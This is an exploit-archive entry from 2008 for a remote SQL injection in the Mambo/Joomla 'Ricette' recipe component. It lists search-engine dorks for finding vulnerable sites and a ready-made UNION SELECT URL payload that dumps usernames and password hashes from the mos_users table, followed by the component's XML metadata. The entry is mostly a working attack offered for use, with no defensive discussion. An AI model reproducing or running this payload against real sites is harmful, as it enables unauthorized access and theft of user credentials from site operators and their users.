[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability
# Published : 2008-02-16
# Author : S@BUN
# Previous Title : Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
# Next Title : Joomla Component com_galeria Remote SQL Injection Vulnerability
###############################################################
#
# joomla SQL Injection(com_ricette)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA?°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: com_ricette
#
# DORK 2 : allinurl: "com_ricette"id
#
################################################################
EXPLOIT :
index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<name>Ricette</name>
<creationDate>05-07-2005</creationDate>
<author>Giorgio Nordo</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>giorgio@equal.it</authorEmail>
<authorUrl>www.equal.it</authorUrl>
<version>1.0</version>
<description>Un ricettario illustrato per Mambo realizzato da Giorgio Nordo per www.equal.it e basato sul componente Wines 1.1 di Tommaso Tamantini.</description>
# www.Syue.com [2008-02-16]